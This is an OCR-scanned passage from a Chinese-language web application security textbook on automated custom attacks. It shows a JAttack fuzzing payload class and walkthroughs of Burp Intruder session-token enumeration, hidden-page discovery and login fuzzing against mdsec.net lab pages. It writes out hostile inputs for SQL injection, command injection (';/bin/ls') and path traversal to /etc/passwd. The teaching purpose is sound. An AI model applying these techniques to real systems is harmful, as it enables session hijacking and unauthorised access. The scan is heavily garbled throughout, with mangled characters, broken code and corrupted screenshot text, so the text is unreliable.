定制 自动 化 技巧 的 第 三 个 主要 用 途 并 不 包含 利用 任何 已 知 的 漏洞 
枚 举 或 提取 信息 ， 而 是 使 用 各 种 旨 在 造成 反 彰 行为 的 、 专 门 设计 的 攻 
击 字 符 串 来 探查 应 用 程序 中 是 否 存在 任何 常见 的 漏洞 。 因 为 以 下 原 
因 ， 与 前 面 描述 的 攻击 相 比 ， 这 种 类 型 的 攻击 更 加 缺乏 针对 性 。 

口 无 论 每 个 参数 的 正常 功能 是 什么 ， 或 者 应 用 程序 硕 望 收 到 何 种 
类 型 的 数据 ， 在 这 种 攻击 中 ， 往 往 需 要 提交 与 测试 应 用 程序 每 个 页 面 
的 每 一 个 参数 相同 的 攻击 有 效 载 何 。 这 些 有 效 载 位 有 时 叫 作 模 糊 测 试 
FFP (fuzz string) ° 

口 事 先 并 不 知道 如 何 确定 “ 触 点 *。 SEVP, TE 
其 中 查找 特殊 的 指标 ， 还 不 如 系统 性 地 截取 尽 可 能 多 的 数据 并 对 其 进 
行 审 查 ， 确 定 攻 击 字 符 串 在 应 用 程序 中 触发 反常 行为 的 情形 ， 然 后 再 
做 深入 调查 。 

当 探 查 各 种 常见 的 web 应 用 程序 漏洞 时 ， 一 些 漏洞 会 通过 特别 明 
显 的 应 用 程序 行为 表现 出 来 ， 这 些 行为 包括 特定 的 错误 消息 或 HTTP 状 
态 码 。 有 时 可 以 根据 这 些 漏 洞 签 名 来 探查 常见 的 漏洞 ， 而 且 ， 上 自动 化 
应 用 程序 漏 润 扫描 器 也 使 用 这 种 方法 来 确定 绝 大 多 数 的 漏洞 (请 参阅 
第 20 章 了 解 相关 内 容 ) 。 然 而 ， 从 理论 上 讲 ， 同 应 用 程序 提交 的 任何 
测试 字符 串 都 会 产生 某 种 可 以 预料 的 行为 ， 在 特定 的 条 件 下 ， 表 明 应 
用 程序 存在 某 种 漏洞 。 为 此 ， 经 验 丰富 的 攻击 者 使 用 定制 目 动 化 技 
巧 ， 束 比 单单 使 用 全 目 动 化 工具 更 有 效率 。 这 类 攻击 者 会 对 应 用 程序 
响应 中 的 每 一 个 相关 细节 进行 全 面 分 析 ; 他 能 够 从 应 用 程序 设计 者 与 
开发 者 的 角度 考虑 问题 。 此 外 ， 他 能 够 发 现 并 调查 请 求 与 啊 应 之 间 不 
寻常 的 联系 ， 而 当前 还 没有 任何 工具 能 够 做 到 这 一 点 。 

功能 复杂 的 大 型 应 用 程序 中 包含 大 量 动 态 页 面 ， 晶 每 个 页 面 都 能 
接受 各 种 参数 ， 这 时 ， 使 用 目 动 化 技巧 查找 漏洞 区 非常 有 用 。 手 动 测 
试 每 一 个 参数 ， 并 追踪 应 用 程序 对 相关 请 求 啊 应 中 的 有 关 细 下 ， 是 一 
个 几乎 无 法 完成 的 任务 。 使 用 目 动 化 工具 代替 完成 需要 手动 执行 的 任 
务 ， 是 在 这 种 应 用 程序 中 探查 漏洞 的 唯一 实用 的 方法 。 

确定 上 一 个 示例 中 的 访问 控制 不 完 图 并 对 其 加 以 利用 后 ， 我 们 还 
可 以 实施 模糊 测试 攻击 来 检查 各 种 基于 输入 的 漏洞 。 作 为 对 受 攻击 面 
的 初步 测试 ， 我 们 决定 在 每 个 参数 中 轮流 提交 以 下 字符 串 。 


n 口 '， 如 末 和 存在 SQL 注 入 漏洞 ， 茶 学 情况 下， 提交 这 个 字符 串 将 阁 
一 个 错误 。 
口 ;bin/ls， 如 果 存 在 命令 注入 漏洞 ， 提 交 这 个 字符 串 可 能 导致 无 
法 预料 的 行为 。 
口 ../../../../.etcpasswd， 如 有 果 存 在 路 径 抽 历 漏洞 ， 提 区 这 个 字符 串 
可 能 生成 一 个 不 同 的 响应 。 
口 xsstest， 如 果 这 个 字符 串 被 复制 到 服务 器 的 啊 应 中 ， 那 么 应 用 
程序 就 容易 受到 跨 站 点 脚本 攻击 。 

我 们 将 对 JAttack 工 具 进 行 扩 展 ， 通 过 创建 一 个 新 的 有 效 载 集 源 ， 
生成 这 些 有 效 载 何 ， 如 下 所 示 : 


g 


class PSFuzzStrings implements PaylcadSource 
static final String[] fuzzStrings = new Stringi] 
;/bin/ls", "“../../../../../ete/passwd", "xsstest* 
j; 
int current = -1; 
public boolean next Payload(} 
{ 


current++; 
return current < fuzzStrings.length; 
) 


public void reset [) 
: 


current = -1; 


} 
public String getPayload{)} 


return fuzzStrings [current]; 


T 注解 任何 探查 应 用 程序 安全 漏洞 的 重要 攻击 都 需要 使 用 


许多 其 他 攻击 字符 串 ， 以 确定 其 他 薄弱 环节 和 前 面 提 到 的 漏洞 的 其 


他 变化 形式 。 我 们 将 在 第 21 章 提供 一 个 更 加 全 面 的 列表 ， 列 出 在 对 
Web 应 用 程序 进行 模糊 测试 时 需要 的 所 有 字符 串 。 


为 使 用 JAttack 进 行 模糊 测试 ， 还 需要 扩展 它 的 啊 应 分 析 代 码 ， 使 
其 能 够 提供 更 多 与 应 用 程序 啊 应 有 关 的 信息 。 显 车 提高 这 种 分 析 能 
的 一 个 简单 办 法 ， 就 是 在 每 个 响应 中 搜索 指示 出 现 某 种 反常 行为 的 党 
AER PTE, 并 记录 它们 在 工具 的 输出 结 采 中 出 现 的 每 一 种 


v= 
首先 ， 在 攻击 配置 : 人 


final String[? eps JS = new gil 


"exception", "illegal", "quotation", "not found", “xsstest” 


然后 插入 下 面 的 parseResponse 方 法 ， 以 在 啊 应 中 搜索 前 面 提 到 的 
每 一 个 字符 串 ， 并 记录 任何 发 现 的 字符 串 : 
for (String grep : grepStrings) 
if (response.indexOf(grep) != -1) 


output.append(grep + "\t"); 


提示 “事实 证 明 ， 枚 举 应 用 程序 中 的 标识 符 时 ， 在 JAttack 


Vv 
中 合并 这 种 搜索 功能 往往 非常 有 用 。 通 常 ， 在 应 用 程序 的 啊 应 中 是 
否 存 在 茶 个 特殊 的 表达 式 是 出 现 * 触 点 ， 的 最 可 靠 指标 。 


我 们 可 以 利用 这 些 代 码 建立 一 个 基本 的 Web 应 用 程序 漏洞 测试 
絮 。 当 实施 具体 的 攻击 时 ， 测 试 员 只 需 用 相关 的 请 求 细 广 对 JAttack 进 
行 配 置 ， 指 示 它 攻击 每 一 个 参数 。 代 码 如 下 所 示 : 


String host = "mdsec.net"; 
int port = 80; 
String method = "GET"; 
String url = */auth/498/YourDetails.ashx"; 
Param[] params = new Parami] 
{ 
new Param({("SessionId”, "CiFSAFDD/DF9E9BDICD2CE40A2E07D19", 
Param.Type.COOKIE, true), 


new Param("uid", "198", Param.Type.URL, true}, 


PayloacSource payloads = new PSPuzzStrings(); 


Ack EAA a at A] ATP eee eat o EILEN, JAttackh tC 
经 同 所 有 请 求 参数 提交 了 攻击 有 效 载 何 。 而 手动 提交 至 少 需 要 几 分 钟 
时 间 ， 审 碍 并 分 析 应 用 程序 收 到 的 响应 则 需要 更 长 时 间 。 

接 下 来 再 对 JAttack 的 输入 结果 进行 手动 检查 ， 务 试 确定 任何 表示 
WETERE ITA ° IAT AAE h fK: 


param payload length 

e nIid 30 502 

sionid bin/ls 0 502 

SessionIGd ../../../../../.-/ete/passwd 302 502 
Sessionl sstes 302 502 

sid 20! 294 exc quotat I 
uid bi 200 8 ex Lor 

uid = swd 200 } exceptior 
uid xeste 200 898 exceptior xsstest 


对 于 修改 SessionId 参 数 的 请 求 ， 应 用 程序 返回 一 个 始终 为 相同 长 
度 的 重 定 回 响应 。 这 种 行为 并 不 表示 存在 任何 漏洞 。 这 并 不 奇怪 ， 
人 用 户 将 被 重 定 同 到 
登 采 页 面 。 

uid 参 数 更 有 意思 。 对 这 个 参数 的 任何 修改 都 会 导致 一 个 包含 字符 
串 exception 的 啊 应 。 这 些 啊 应 的 长 度 可 变 ， 表 明 不 同 的 有 效 载 何 会 导 
致 不 同 的 啊 应 ， 因 此 这 些 响 应 可 能 并 不 是 常规 的 错误 消 恩 。 而 且 ， 可 
以 看 到 ， 提 交 单 引号 上 时， 应 用 程序 的 啊 应 包含 字符 串 quotation， 这 可 
能 是 SQL 错误 消息 的 一 部 分 ， 说 明 应 用 程序 可 能 存在 SQL 注入 漏洞 ， 
我 们 应 进行 手动 测试 来 确认 这 一 点 〈 请 参阅 第 9 章 ) 。 此 外 ， 我 们 还 发 
现 ， 应 用 程序 的 啊 应 回 显 了 了 有效 载 售 xsstest。 因 此 应 进一步 探查 这 种 
行为 ， 以 确定 是 否 可 以 利用 该 错误 消息 实施 跨 站 点 脚本 攻击 (请 参阅 
第 12 章 文 解 相 关内 容 ) 。 


尝试 访问 


http://mdsec.net/auth/498/ 


14.5 整合 全 部 功能 :Burp Intruder 


JAttack 由 不 到 250 行 的 简单 代码 构成 ， 然 而 ， 当 对 一 个 回应 用 程 
序 提出 的 请 求 进行 模糊 测试 时 ， 它 在 几 秒 钟 内 惑 能 发 现 至 少 两 个 严重 
的 安全 漏洞 。 

尽管 它 的 功能 强大 ， 但 是 ， 只 要 开始 使 用 JAttack 这 样 的 工具 实施 
自动 化 定制 攻击 ， 渗 透 测试 员 就 立即 可 以 发 现 其 他 更 有 用 的 功能 。 按 
现在 的 情况 ， 需 要 在 工具 的 源 代 码 中 配置 每 一 个 目标 请 求 ， 然 后 重新 
编译 它 。 但 最 好 是 从 一 个 配置 文件 中 读 取 这 些 信 息 ， 然 后 在 运行 时 动 
态 构建 攻击 。 实 际 上 ， 最 好 的 办 法 是 建立 一 个 友好 的 用 户 界 面 ， 可 通 
过 它 在 几 秒 钟 内 配置 上 述 攻 击 。 

许多 时 候 ， 渗 透 测试 员 还 需要 以 更 加 灵活 的 方式 生成 有 效 载 傈 ， 
并 使 用 比 我 们 创建 的 有 歼 载 傈 源 更 高 级 的 源 。 而 且 ， 通 常 还 需要 文 持 
SSL、HTTP 验 证 、 多 线程 请 求 、 目 动 跟随 重 定 同 ， 并 对 有 效 载 傈 内 的 
不 常见 字符 进行 目 动 编码 。 有 时 ， 一 次 只 修改 一 个 参数 可 能 觉得 限制 
WA; 攻击 者 可 能 希望 同时 在 两 个 参数 中 注入 不 同 的 有 效 载 位 来 源 。 
为 便于 参考 ， 最 好 是 保存 应 用 程序 的 全 部 响应 ， 这 样 就 可 以 立即 检查 
一 个 有 用 的 响应 ， 了 解 改 生 了 什么 状况 ， 甚 至 手动 调整 对 应 的 请 求 并 
重新 提出 这 个 请 求 。 除 了 不 断 修 改 和 提出 同一 个 请 求 ， 有 时 需要 处 理 
多 阶段 进程 、 应 用 程序 会 话 和 预 请 求 令 脾 。 同 样 ， 最 好 是 将 这 个 工具 
人 
[粘贴 信息 。 

Burp Intruder 是 唯一 能 够 执行 所 有 这 些 功 能 的 工具 。 它 专门 为 通过 
最 少 的 配置 实施 各 种 自动 化 定制 攻击 而 设计 ， 并 且 在 输出 结果 中 提供 
大 量 细节 ， 帮 助 迅 速 确定 “ 触 点 ”和 其 他 反常 现象 。 它 还 可 与 其 他 Burp 
Suite 工 具 完 全 整合 。 例 如 ， 可 以 在 代理 服务 右 中 拦截 一 个 请 求 ， 将 它 
en enn eet 
种 漏洞 。 

下 面 指 述 Burp Intruder 的 基本 功能 与 配置 ， 然 后 分 析 使 用 它 执 行 目 
动 化 定制 攻击 的 一 些 示例 。 

1. 安置 有 效 载荷 

Burp Intruder 使 用 一 个 类 似 于 JAttack 的 概念 型 模型 ， 在 请 求 的 特定 
位 置 安置 有 效 载 何 ， 并 使 用 一 个 或 几 个 有 效 载 往来 源 。 然 而 ， 它 的 功 
能 并 不 仅 限 于 将 有 效 载 傈 字符 串 插 入 到 请 求 参 数值 中 ;有效 载 傈 可 安 


置 在 参数 值 的 某 个 局 部 位 置 或 参数 名 中 ， 也 可 以 安装 在 请 求 消 息 头 或 
主体 的 任何 位 置 。 

确定 以 某 个 特殊 请 求 作为 攻击 对 象 后 ，Burp Intruder 使 用 一 组 标记 
o 效 载 何 位 置 ， 指 明 插 入 有 效 载 傈 的 起 始点 与 结束 点 ， 如 
14-1771 ° 
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图 14-1 EART 


TEST iL A AAEE, PEZ ERNE CERA aT 
重 写 。 如 有 宁 没 有 插入 有 效 载 何 ， 束 提交 标记 间 的 文本 。 为 便于 一 次 测 
试 一 个 参数 ， 同 时 将 其 他 参数 保持 原样 ， 这 样 做 是 必要 的 。 这 一 做 法 
与 对 应 用 程序 进行 模糊 测试 时 完全 相同 。 单 击 auto 按 钮 将 指示 Intruder 
在 所 有 URL、cookie 和 主体 参数 值 中 设 是 有 效 载 傈 位 置 ， 从 而 将 在 
JAttack 中 需要 手动 操作 的 任务 目 动 化 。 

sniper 攻 击 类 型 是 最 第 见 的 一 种 攻击 类 型 ， 它 的 作用 与 JAttack 的 请 
求 引 擎 相同 : 一 次 针对 一 个 有 效 载 傈 位 置 ， 在 那个 位 置 提交 所 有 有 效 
载 柯 ， 然 后 转 癌 下 一 个 位 置 。 其 他 攻击 类 型 允许 使 用 几 个 有 效 载 舍 ， 
以 不 同 的 方式 一 次 针对 几 个 位 置 进行 攻击 。 

2. 选择 有 效 载荷 


准备 攻击 的 下 一 个 步 又 是 选择 将 要 在 指定 位 置 插入 的 有 效 载 集 。 
Intruder 包 含 大 量 用 于 生成 攻击 有 效 载 答 的 内 置 功能 。 

口 预 完 设置 与 可 配置 的 数据 列表 。 

口 根据 任何 语法 模式 对 有 效 载 丛 进行 定制 迭代 。 例 如 ， 如 果 应 用 
程序 使 用 ABC45D 形 式 的 用 户 名 ， 那 么 可 以 使 用 定制 迭代 句 届 历 所 有 
可 能 的 用 户 名 。 

口 字 符 与 大 小 写 蔡 换 。 根 据 最 初 的 有 效 载 从 列 表 ，Intruder 可 修改 
单个 的 字符 及 其 大 小 写 ， 以 生成 它们 的 变化 形式 。 这 项 功能 在 对 密码 
实施 蛮 力 攻击 时 非 党 有用， 例如， 字符 串 password 可 修改 为 
p4ssword ` passw0rd ` Password ` PASSWORD® ° 

aF AATED ` RASS o BUF AY yak tell BN 
进 制 、 整 数 或 分 数 、 按 顺序 排列 、 逐 步 递增 或 完全 随机 。 当 知道 一 些 
有 效 值 的 大 小 ， 但 无 法 确定 推 新 这 些 值 的 任何 可 靠 模式 时 ， 在 一 个 指 
定 的 范围 内 生成 随机 数字 可 用 于 搜索 “ 触 点 ”。 

口 某 些 情况 下 ， 日 期 和 数字 有 者 相同 的 用 途 。 例 如 ， 如 果 登 未 表 
单 要 求 输入 出 生日 期 ， 那 么 就 可 以 使 用 这 项 功能 对 指定 范围 内 的 所 有 
有 效 值 实施 蛋 力 攻击 。 

口 可 使 用 非法 Unicode 编 码 ， 通 过 提交 恶意 字符 的 编码 形式 避 开 一 
些 输入 过 滤 。 
et E R 


口 28 ge By AE Bi SRATI RERE KEWENE 
排列 组 合 。 许 多 时 候 ， 由 于 它 能 生成 大 量 的 请 求 ， 使 用 这 种 功能 是 我 
们 能 够 依赖 的 最 后 一 个 办 法 。 例 如 ， 对 仅 包 含 小 写字 母 字 符 的 6 位 数 密 
码 进行 亦 力 攻击 ， 将 生成 300 多 万 个 排列 组 合 ; 仅 通 过 远程 访问 应 用 程 
序 几 乎 不 可 能 提交 如 此 数目 庞大 的 请 求 。 

口 “字符 打 乱 >” 和 “位 翻转 功能， 可 用 于 系统 化 地 操纵 参数 的 现 有 
en 
阅 第 7 章 ) 。 

除 有 效 载 合生 成 功能 外 ， 还 可 以 配置 一 些 规 则 ， 在 使 用 有 效 载体 
值 之 前 对 每 个 值 进 行 任意 处 理 。 这 包括 字符 串 和 大 小 写 修改 、 各 种 编 
解码 方案 以 及 散 列 操作 。 这 样 做 有 助 于 在 各 种 非常 规 情 况 下 构建 有 用 
HARER ° 

默认 情况 下 ， 在 请 求 中 插入 字面 量 字 符 会 使 请 求 失效 ，Burp 
Intruder 会 对 这 些 字 符 进行 URL 编 码 。 

3. 配置 响应 分 析 


m 


在 实施 攻击 前 ， 渗 透 测 试 员 应 当 确定 想 要 分 析 的 服务 器 响应 属 
性 。 例 如 ， 当 枚 举 标 识 符 时 ， 可 能 需要 在 每 个 啊 应 中 搜索 一 个 特殊 的 
TIER; 在 模糊 测试 时 ， 攻 击 者 也 许 和 希望 扫 横 大 量 稍 见 的 错误 消 恩 


默认 情况 下 ，Intruder 会 在 它 的 结果 表 中 记录 HTTP 状 态 码 、 咖 应 
长 度 、 服 务 器 设 定 的 任何 cookie 以 及 收 到 啊 应 的 上 时间 。 和 JAttack 一 
样 ， 还 可 以 配置 Burp Intruder 对 应 用 程序 的 啊 应 进行 其 他 一 些 自 定义 分 
析 ， 以 帮助 确定 表明 存在 漏洞 或 值得 深入 调查 的 数据 。 可 以 指定 在 啊 
应 中 搜索 的 字符 串 或 正则 表达 式 ， 可 以 设 定 自 定义 字符 串 ， 控 制 从 服 
务 絮 的 啊 应 中 提取 数据 ;还 可 以 指示 Intruder 检 查 每 个 啊 应 是 否 包 含 攻 
击 字 符 串 本 身 ， 以 帮助 确定 跨 站 点 脚本 和 其 他 啊 应 注入 漏洞 。 

确定 有 效 载 傈 位 置 、 有 效 载 何 来 源 以 及 需要 对 服务 絮 啊 应 进行 哪 
些 分 析 后 ， 渗 透 测 试 员 就 可 以 实施 攻击 。 下 面 简要 说 明 如 何 使 用 
Intruder 实 施 一 些 常见 的 目 动 化 定制 攻击 。 

4. 攻击 1: 枚 举 标识 符 

假设 正 以 一 个 支持 匿名 用 户 自我 注册 的 应 用 程序 为 攻击 目标 。 创 
建 一 个 账户 ， 登 录 应 用 程序 ， 访 问 最 少量 的 功能 。 在 这 个 阶段 ， 应 用 
程序 的 会 话 令 有 牌 是 一 个 明显 的 攻击 对 象 。 连 续 进 行 几 次 登录 ， 会 得 到 
LFS: 

000000-£b2200-16cb12-172ba72551 

000000-bc7192-16cb12-172ba7279e 
000000-73091f-16cb12-172ba729e8 
000000-918cb1-16cb12-172ba72a2a 
000000-aa820f-16cb12-172ba72b58 
000000-bc8710-16cb12-172ba72e2b 


SEARS ETA RES eS ACH: 很 明显 ， 令 牌 中 几 
乎 有 一 半 的 内 容 没有 发 生变 化 ; 但 是 ， 令 牌 的 第 二 部 分 实际 上 并 未 被 
应 用 程序 处 理 。 完 全 修改 这 个 部 分 并 不 会 使 令 牌 失 效 。 而 且 ， 虽 然 这 
些 令 牌 并 不 严格 按 顺 序 排列 ， 但 最 后 一 部 分 明显 以 某 种 方式 同上 递 
增 。 根 据 这 些 信息 ， 渗 透 测 试 员 也 许 能 够 对 应 用 程序 实施 会 话 动 持 攻 
z 


要 利用 目 动 技巧 实施 这 个 攻击 ， 需 要 找到 一 个 可 用 于 探查 有 效 令 
牌 的 请 求 / 啊 应 对 。 通 币 ， 任 何 访问 应 用 程序 通过 验证 的 页 面 的 请 求 都 
可 用 于 这 种 目的 。 假 设 以 每 名 用 户 登 录 后 显示 的 主页 为 攻击 对 象 : 


GET /auth/502/Home.ashx HTTP/1.1 
Host: mdsec.net 
Cookie: SessionID=000000-£b2200-16cb12-172ba72551 


由 于 已 经 知道 会 话 令 牌 的 结构 及 应 用 程序 如 何 处 理 令 牌 ， 因 此 ， 
只 需 令 牌 的 最 后 一 个 部 分 融 可 实施 攻击 。 实 际 上 ， 根 据 前 面 确定 的 令 
牌 序列 ， 最 有 效 的 初步 攻击 只 需 修改 令 牌 最 后 的 儿 位 数字 。 因 此 ， 用 
Intruder 配 置 唯一 一 个 有 效 载 何 位 置 ， 如 图 14-2 所 示 。 


bump suite professional joss) =) x™| | 


burp intruder repeater window about 


target | proxy gpicer scanner intnucer tepeater sequencer cacoder comparar ootions alerts 
1 (i 


target | postions | payicacs | options 


| v 
length 380 


= add § 


ac 


cept: textshtml, applicaticn/xhtml¢xml, * 
Referer: hetys: //mdsec.net/auth/ $02 


Accept-Languaget en-GE | Geer § 
User-Agent: Morilla/5.o0 ompatible; MSIE 9.0: Vindows NT 6.1: WOWVE4: , 
Trident/5.0) auto § 
Cookie: Sess:on!ld=000000-FS4£4E-ifch is-IDCTAOCHSESS - 


| reies 


图 14-2 EAEN A AER A E 


有 效 载荷 需要 遍历 最 后 三 位 的 所 有 可 能 值 。 令 牌 使 用 的 可 能 是 十 
六 进 制 字符 集 : 0~9 与 ar*f。 因 此 ， 配 置 一 个 有 效 载 符 来 源 生 成 
0x000~0xfff 之 间 的 所 有 十 六 进 制 数字 ， 如 图 14-3 所 示 。 


burp suite professional Eo (Eza 


bap iniuder repesier window adain 


format 


图 14-3 Boe aH TVA we tar 


在 枚 举 有 效 会 话 令 牌 的 攻击 中 ， 通 常 可 以 直接 确定 “ 触 点 ”。 在 当 
前 的 示例 中 已 经 确定 : 如 果 提 交 一 个 有 效 的 令 牌 ， 应 用 程序 会 返回 一 
个 HTTP 2008 bY; 否则 就 返回 一 个 退回 登录 页 面 的 HITP 302 重 定 问 。 
因此 ， 测 试 员 不 必 为 攻击 配置 任何 定制 的 响应 分 析 。 

实施 攻击 后 ，Intruder 将 迅速 循环 提出 所 有 请 求 。 攻 击 结果 在 一 个 
表格 中 显示 ， 可 以 单 击 表 的 列 标题 ， 根 据 该 列 的 内 容 对 结果 进行 分 
类 。 按 状态 码 分 类 可 帮助 轻松 确定 已 经 发 现 的 有 效 令 牌 ， 如 图 14-4 所 
ZR ° 


intruder attack 1 co | teh bie) 
atack save columns 


Filter: showing all Rems 


| results | target postions § payloads options 
request payload status error limeo length comment 
200 | {1357 baseline request a 

f000 320 200 | | ta 1329 | = 
1855 357 200 | ba (1398 

830 36f 200 z a| 11402 
{s91 37a 200 = i} 11982 

899 382 200 | lal [1429 
1921 398 200 L a 11324 

927 39e 200 | 11401 

947 302 200 C 国 li357 | 

948 3ba 200 En Faas 7 ] 

i 1000 302 | J482 | =| 


] 

[| request | response 

| taw | headers | hex | nimi | render 

jtype="text/cas">H3 1 tont-tamily: Verdana, Arial, Helvetica, sans-serif: a 
font-size: 1.0m: line-height 1-0em: }bòdy 1 fant- pcb Verdana, Arial, | 
Helvetica, sans-serif; font-size: 0.Gem; )</styler</ head» dy> xtab ile 
bgcolor="#cozog0" vidth=" LOO’ "><tr><td><font face="Ariai™ size "S">Snbap ; Home 
ipage</tont></td><tcd><img border="0" srce"/vahh, png” wicth="128" height="74" 
h4lign="right"></td></tr></table><rable border=" 1 bgcolor="”#000000" 

[bordercolor="#00 O00" cellspacing?"0" cellpadding="0"vidth="100$" rani 
atyle="border-collaps¢: collapse"><tr><td></td></er></table><br/> | 


wW align="absmiddle" src="home.,png">Gnbsp:;Logged in as: 
Administrator. cbr><br><a nref="5 showPaqe.ashx?page id=320109032">Admin</ a><br><a 
refe"ShoePace arh nate: de I Oi OO ws Yar tah wd tes aychr + ed 
z? 0 matches 


n 320 f 4096 T = a i 
图 14-4 “分 类 攻击 结果 以 迅速 确定 “ 触 点 ” 


攻击 取得 成 功 。 现 在 渗透 测试 员 可 以 选择 任何 返回 HITP 2001M 
的 有 效 载 集 ， 用 这 个 有 peo ais 会 话 令 牌 最 后 的 三 个 数字 ， 从 而 动 
持 其 他 应 用 程序 用 户 的 会 话 。 然 而 ， 对 结果 表 进 行 仔细 分 析 后 会 发 
现 : i Ger aay Pen leis 相同 ， 因 而 大 多 数 
HTTP 200 啊 应 的 长 度 也 大 致 相同 。 然 而 ， 其 中 有 两 个 啊 应 要 更 长 一 
些 ， 人 eh 

可 以 在 Intruder 中 双击 其 中 一 个 结果 ， 以 HTTP 源 代码 或 HTML 格 
式 完整 显示 服务 器 的 响应 。 之 后 会 发 现 ， 与 主页 相 比 ， 较 长 的 主页 中 
ee o FEHEM, OO SAFES EB SAR 
y 用 oO 


尝试 访问 


http://mdsec.net/auth/502/ 


Vo ”提示 事实 证 明 ， 响 应 长 度 往往 是 一 个 明显 的 指标 ， 指 出 
值得 进一步 调查 的 反常 啊 应 。 在 上 面 的 示例 中 ， 一 个 长 度 不 同 的 啊 
y 会 让 测试 员 发 现在 设计 攻击 时 未 曾 预料 到 的 管理 员 会 话 令 牌 。 因 
此 ， 即 使 其 他 属性 提供 了 一 个 可 靠 的 “ 触 点 ”指标 (如 HTTP 状 态 
码 ) ， 还 是 应 始终 检查 响应 长 度 列 ， 以 确定 其 他 有 用 的 咽 应 。 


5. 攻击 2: 获取 信息 

进一步 浏览 到 应 用 程序 的 已 通过 验证 的 区 域 ， 我 们 注意 到 应 用 程 
序 在 URL 参 数 中 使 用 索引 号 来 标识 用 户 请 求 的 功能 。 例 如 ， 以 下 URL 
用 于 显示 当前 用 户 的 “用 户 资 料 ” 页 面 : 


https: //mdsec.net/auth/502/ShowPage.ashx?pageidđ=32010039 


这 种 行为 提供 了 一 个 极 好 的 机 会 ， 可 用 于 搜集 之 前 尚未 发 现 及 未 
获得 正确 授权 的 功能 。 为 此 ， 可 以 使 用 Burp Intruder 志 历 一 系列 可 能 的 
pageid 值 ， 并 提取 出 所 发 现 的 每 个 页 面 的 标题 。 

在 这 种 情况 下 ， 通 党 较 为 明知 的 做 法 ， 是 在 某 个 已 知 包 含有 效 值 
的 数值 范围 内 开始 内 容 搜 集 。 为 此 ， 可 以 将 有 效 载 何 位 置 标记 设置 为 
ae 如 图 14-5 所 示 ， 并 生成 00 到 99 范 围 内 的 有 效 
BH] ° 


Wm SS 


burp inyuder fepesier window about 
| target proxy | spider | scanner Iniuder | repeater | saquencer | decoder | comparer | options | ales 
ae l : | 


roet 1B on: 3 Payoads ) toads “ options 


GET /auth/50°/ShowPage, ashx?pageid=3201 

Accept: texctyhtml, application/xhrml+xml, */* 

Referer: https: //mdisec.net/auth/502/lome.ashx 

Accept-Language: en-GB 

User-Agent: Hortilla/5.0 (compatible: NSIE 9.0: Yindovs NT €.1: WOWS4: 
Trident/§.0) 

Acerpt-Encoding: gzip, deflate 

Host: mdisec. net 

Connection: Reep-Alive 

Cookie: Sess onTd-O000N00-ASAETA-) fe 12 -ABLIARCIOL 


图 14-5 ”安置 有 效 载 荷 


攻击 者 可 以 配置 Intruder 使 用 “提取 Grep” 功 能 以 可 用 的 方式 截取 所 
有 这 些 信息 。 其 运作 方式 与 JAttack 的 提取 功能 类 似 一 一 只 需 指 定 想 要 
提取 的 数据 之 前 的 表达 式 ， 如 图 14-6 所 示 。 


burp suite professions! 


burp intuder repevier window about 


图 14-6 配置 “提取 Grep” 功 能 


实施 此 攻击 将 迅速 遍历 pageid 参 数 最 后 两 位 的 所 有 可 能 值 ， 并 显 
示 每 个 响应 中 的 页 面 标题 ， 如 图 14-7 所 示 。 从 图 中 可 以 看 出 ， 一 些 响 
应 似乎 包含 有 用 的 管理 功能 。 此 外 ， 一 些 响 应 为 指向 其 他 URL 的 重 定 
向 ， 这 需要 进一步 调查 。 为 此 ， 可 以 配置 Intruder 实 施 攻 击 ， 以 提取 这 
= 目标 ， 或 者 自动 访问 这 些 重 定向 ， 并 显示 最 终 的 啊 应 中 的 
页 面 标题 。 


<Torm merhode"post" accion’ "ShovPage. ash 7page ide22o10048R" 
autocomplete="off"><table cellspacing="10")<tr><td>Real name; </td><td><isaput 
name="realnane” 

typer"text"/></td><cd>Gnbsp :</td></tr><tr><td>Vsername: </td><td><input 
nepe" username: " 

type="text" /o</rd><rdsenbsp 7</td></tr><tr><td>Role: </td><td><selece 
name="uoerrole” styler "widch: ISD: "<option gelected="eelected" 
value*"user">User</option><option 

value=" actmin’>A@ministrator</opt ton></s¢lect></td></tr><tr><td>Password: </td><td> 
<input name="passvord” type="passvord"/></td><td>Must contain at least 8 
characters, including letters and numbers. ¢/cd></tre<tro<td>Confirm 
password: </td><td><input name="confircmpassvord" 


=< ©. = 
R47 AIER EN RRE ER a 


尝试 访问 


http://mdsec.net/auth/502/ 


6. 攻击 3: 应 用 程序 模糊 测试 

除 利用 日 志 功 能 提取 有 用 的 信息 外 ， 当 然 还 可 以 探查 应 用 程序 中 
是 否 存在 常见 的 漏洞 。 为 确保 测 斌 合理， 攻击 者 应 该 测试 所 有 的 参数 
和 请 求 ， 从 登录 请 求 开始 。 

为 迅速 对 前 面 的 请 求 进行 模糊 测试 ， 必 须 在 所 有 请 求 参 数 中 设 定 
有 效 载 傈 位置。 只 需 单 击 position 选 项 卡 上 的 auto 按 钮 即 可 完成 这 项 操 
作 ， 如 图 14-8 所 示 。 


burp suite profecsicral j= [= 


图 14-8 配置 Burp Intruder 对 登录 请 求 进行 模糊 测试 


和 使 用 JAttack 实 施 模 糊 测 试 攻击 一 样 ， 接 下 来 需要 手动 检查 结 
表 ， 确 定 任 何 值得 深入 调查 的 反常 现象 ， 如 图 14-9 所 示 。 与 前 面 的 攻 


击 中 一 样 ， 可 以 单 击 列 标题 ， 以 各 种 方式 对 响应 进行 


确定 有 用 的 数据 。 


分 类 ， 从 而 迅速 


Bcelipadding*"0"vidth"1O0N" etyles"border-collapwe: collapwe"><tr><td></td></tr></table><br/> 


Sfoum method="post" id-“fcocmi" nawe="forwl aption="Defauit. ashr” eutonenn laten 二 


| scion re A QO">etc> de ;< CALA IRD HIS pane npr pane” types "tex 


values” */o</td><cd>enbap: </ re/ cry a a B (Cda<to><impur Bame*"passvora* eee 


value=""/>< feds<tascinput typer"subwit” valuee"Log = fsc/ease/ tr></tabie> </form> <br/> 


Arere"Bhegiater. astx"spegiseerc/ ry ye qeetation mark after the zieni n etring tt 


Incorrect syntax near </po ty drm 


图 14-9 对 一 个 请 求 进行 模糊 测试 得 到 的 结果 


对 测试 结果 进行 初步 分 析 可 以 得 出 结论 ， 应 用 程序 似乎 易于 受到 
SQL 注 入 。 在 E its eam a 应 用 程序 会 返回 


另 一 个 啊 应 ， 其 消息 中 包含 字符 串 quotation 和 syntax。 
示 ， 需 要 进行 手动 调查 才 外 gE 确定 和 利用 其 中 的 漏洞 。 


这 种 行为 明确 表 


尝试 访问 


http://mdsec.net/auth/502/ 


¥ 提示 可 以 右键 单 击 任何 看 似 有 用 的 结果 ， 将 响应 发 送 至 
